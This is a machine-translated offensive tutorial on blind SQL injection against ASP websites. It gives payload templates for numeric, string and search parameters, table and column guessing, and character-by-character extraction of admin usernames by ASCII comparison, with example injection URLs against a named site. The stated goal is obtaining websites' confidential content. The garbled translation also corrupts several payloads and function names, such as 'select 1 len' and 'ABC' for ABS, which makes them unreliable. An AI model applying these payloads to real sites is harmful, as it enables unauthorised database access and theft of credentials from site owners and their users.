ASP vulnerability Full contact-Advanced Chapter

In the introductory section, we learned how to judge SQL injection, but it is far from enough to really get the confidential content of the website. Next, we'll continue to learn how to get what we want from the database, first of all, let's look at the general steps of SQL injection:

　　 The first section, the general steps of SQL injection

First of all, judge the environment, look for the injection point, and judge the database type, which is already mentioned in the introductory article.

Secondly, according to the type of injection parameter, the original of the SQL statement is reconstructed in the mind, according to the type of parameter, it is divided into the following three kinds:

(A) The parameters of id=49 such injections are numeric, and the SQL statements are as follows:
Select * from table name where field =49
The injected parameter is id=49 and [query condition], that is, the build statement:
Select * from table name where field =49 and [query criteria]


(B) class= series The parameters of such injections are character types, and the original SQL statements are roughly as follows:
Select * from table name where field = ' Soap series '
The injected parameters are the class= series ' and [query conditions] and ' = ', that is, the generated statement:
Select * from table name where field = ' serials ' and [query conditions] and ' = '

(C) When the search does not filter the parameters, such as the keyword= keyword, the original SQL statement is roughly as follows:
Select * from table name where field like '% keyword% '
The injected parameter is keyword= ' and [query condition] and '%25 ' =, that is, the build statement:
Select * from table name where field like '% ' and [query condition] and '% ' = '% '

Next, replace the query condition with the SQL statement, guessing the table name, for example:

Id=49 and (Select Count (*) from Admin) >=0

If the page is the same as the id=49, the attached condition is set, that is, the table admin exists, otherwise, that is not present (please remember this method). This loops until the table name is guessed.

When the table name is guessed, replace count (*) with count (field name) and use the same principle to guess the field name.

Some people will say: There are some accidental ingredients, if the table name is very complicated and irregular, it is no longer play. That's right, the world doesn't exist. 100% successful hacker technology, flies do not ding seamless eggs, no matter how sophisticated the hackers, are due to other people's procedures are not strictly written or user confidentiality awareness is not enough to get a hand.

A bit off the topic, in other words, for SQL Server library, there are ways to let the program tell us the table name and field name, we will do in the advanced article introduction.


Finally, after the table name and the name of the column are successfully guessed, then use the SQL statement to get the value of the field, the following describes a most common method-ascii verbatim decoding method, although this method is slow, but certainly a feasible method.

For example, we know that there are username fields in table admin, first we take the first record and test the length:

http://www.19cn.com/showdetail.asp?id=49;; and (select 1 len (username) from Admin) >0

First explain the principle: if the top 1 username length is greater than 0, then the condition is set up; then >1, >2, >3 this test down, until the condition is not established, such as the establishment of >7, >8 is not established, is Len (username) =8

Of course, no one will be stupid from 0,1,2,3 a test, how to compare quickly to see their own play. After the length of the username is obtained, the nth character is intercepted with mid (username,n,1), and ASC (mid username,n,1) gets the ASCII code, for example:

Id=49 and (select top 1 ASC (mid username,1,1) from Admin) >0

It is also used to gradually narrow the range of the 1th character of the ASCII code, note that the English and the number of ASCII between 1-128, you can use the binary method to accelerate guessing, if written in the program test, efficiency will be greatly improved.

　　 section II, SQL injection common functions

People with a basic SQL language have a much higher success rate in SQL injection than people who are unfamiliar. We need to improve our SQL level, especially some common functions and commands.

ACCESS:ASC (character) Sqlserver:unicode (character)

Function: Returns the ASCII code of a character

ACCESS:CHR (digital) Sqlserver:nchar (digital)

function: Contrary to ASC, returns characters based on ASCII code

Access:mid (String, n,l) sqlserver:substring (string, n,l)

Function: Returns a substring of the string from N-character length L, that is, the string between N and N+l

ACCESS:ABC (digital) sqlserver:abc (digital)

Function: Returns the absolute value of a number (used when guessing Chinese characters)

Access:a between B and C sqlserver:a between B and C

Function: To determine whether a is bounded between B and C

　　 section III, Chinese processing methods

Encountered in the injection of Chinese characters is often the case, some people encounter Chinese characters will want to retreat. In fact, as long as the Chinese code has some understanding, "Chinese phobia" can soon be overcome.

First of all, a little common sense:

In Access, the ASCII code in Chinese may be negative, take out the negative and use ABS () to get the absolute value, the Chinese characters will not change.

SQL Server, Chinese ASCII is a positive number, but because it is Unicode dual-digit encoding, can not use function ASCII () to obtain the ASCII code, you must use the function Unicode () to return the Unicode value, and then use the NCHAR function to get the corresponding Chinese characters.

After understanding the above two points, is not that the Chinese guess solution is actually similar to English? In addition to the use of functions to be aware of, guess the scope of a larger point, the method is no different.